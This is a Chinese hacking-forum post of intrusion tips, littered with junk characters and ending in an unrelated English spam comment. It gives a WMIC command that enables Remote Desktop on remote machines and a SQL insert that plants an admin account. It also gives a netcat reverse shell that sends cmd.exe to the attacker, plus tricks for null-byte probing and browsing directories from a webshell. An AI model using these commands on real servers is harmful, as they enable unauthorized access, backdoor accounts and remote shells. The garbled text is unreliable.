' L% S% |& B5 w最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> $ l/ O; f( \+ Z) Y6 G! y
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. 1 K# L4 C, T" m- o+ P: s' w7 z6 g% Z* U- U; G
. S! X4 Y6 t; x3 t
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:3 G! Q: X1 c% f+ A
Insert into admin(user,pwd) values('test','test')- I& I4 E9 ^6 [" f
2 I% N \) B) V. p- ~
6 N# H) |& y# A% a- L- x; j0 k
NC反弹 . M2 o9 _3 N4 Y9 ~% c先在本机执行: nc -vv -lp 监听的端口 (自己执行) # V; b- G6 p, n4 V) F* ~# i5 x& e
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行) ( i# N( ]" q, b6 \8 f Z# S9 |6 F) ^4 r$ V; d( |
2 p. J- @8 T/ @2 Y& J& A; v在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 , X4 f- ?5 q2 R9 E1 n+ e% [ 0 W5 ]4 l9 F* A. U6 p5 r有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录0 M( }3 \/ z9 X% g. H
例如: * Q$ A6 X9 S" p9 Z; ^& @' }, Fsubst k: d:\www\ 用d盘www目录替代k盘 ( H" r- I8 f" nsubst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta